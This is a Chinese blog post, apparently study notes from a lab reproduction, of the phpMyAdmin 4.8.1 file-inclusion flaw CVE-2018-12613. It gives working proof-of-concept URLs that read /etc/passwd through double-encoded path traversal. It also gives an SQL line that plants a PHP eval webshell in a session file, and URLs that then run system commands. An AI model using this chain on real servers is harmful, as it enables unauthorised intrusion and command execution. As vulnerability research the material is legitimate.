phpMyAdmin 4.8.1 远程文件包含(CVE-2018-12613)

字数:317字 | 预计阅读时长:1分钟

背景

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

复现过程

漏洞验证

1.使用如下POC,若成功读取/etc/passwd文件内容,则存在漏洞

1
http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

利用session写shell

1.需先登录phpmyadmin,执行sql语句,代码为GET传参,图为POST传参

1
SELECT "<?php eval($_GET['cmd']); ?>"

2.F12获取cookie

将cookie的值和sess_拼接,便得到了存储在服务器端的session文件,这里注意,图中的cookie值因测试多次和实际值不一样,因为人懒,懒得再截图。

sess_575f961b1e574936b7a6e1d237f82ade

3.使用POC命令执行

当然实际环境中就根据经验或其他手段来猜测路径了

1
2
http://URL:端口/index.php?cmd=phpinfo();&target=db_sql.php%253f/../../../../tmp/sess_575f961b1e574936b7a6e1d237f82ade
/var/www/html

1
http://URL:端口/index.php?cmd=system(%27whoami%27);&target=db_sql.php%253f/../../../../tmp/sess_575f961b1e574936b7a6e1d237f82ade

参考链接

http://www.pianshen.com/article/6744149320/

http://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2018-12613/README.zh-cn.md/

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。